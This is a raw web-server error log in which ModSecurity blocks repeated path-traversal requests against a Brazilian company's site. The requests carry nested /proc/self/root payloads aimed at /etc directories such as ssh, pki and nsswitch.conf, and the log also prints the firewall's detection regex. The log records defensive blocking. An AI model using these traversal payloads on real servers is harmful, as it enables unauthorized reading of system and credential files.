[Mon Mar 16 10:27:45.243471 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:52736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFUZqj1wV0Si-OkefcygAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:45.916228 2026] [access_compat:error] [pid 10651:tid 140411590858496] [client 34.82.116.6:49356] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 10:27:46.535947 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:52742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFUglT9VtDQc7bgUyfiQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:48.992794 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:52748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFVI6lpbStxTqkSktgpAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:50.366223 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:51606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFVnbQATo66fKoS7xAVQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:51.501889 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:51608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFV46lpbStxTqkSktgpQAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:52.758671 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:51614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFWI6lpbStxTqkSktgpgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:53.910711 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:51624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFWZqj1wV0Si-OkefcywAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:55.202779 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:51630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFW7ysWC90G-1nBrA4HQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:56.540435 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:51638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFXLysWC90G-1nBrA4HgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:57.859073 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:51648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFXbysWC90G-1nBrA4IAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:59.200435 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:51652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFX5qj1wV0Si-OkefczgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:13.625561 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:52500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFbXjZBu2q05ozVU9IUwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:16.015781 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:41982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFcBXjF1vJNtV6CWrsUgAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:17.320555 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:41996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFcQlT9VtDQc7bgUyfkgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:18.723270 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:41998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFcnbQATo66fKoS7xAWAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:22.978046 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.244.31:60034] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgFdglT9VtDQc7bgUyfmQAAAQs"]
[Mon Mar 16 10:28:26.590356 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:42008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFepqj1wV0Si-Okefc1gAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:27.870790 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:57556] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFe9SswJuvopo3lOhS9AAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:30.253651 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:57570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFfv9ocpUE4ed4uDzgZQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:28:35.386450 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:39280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFg_9ocpUE4ed4uDzgawAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:28:36.340550 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:51922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFhLysWC90G-1nBrA4RAAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:28:37.616244 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:56278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 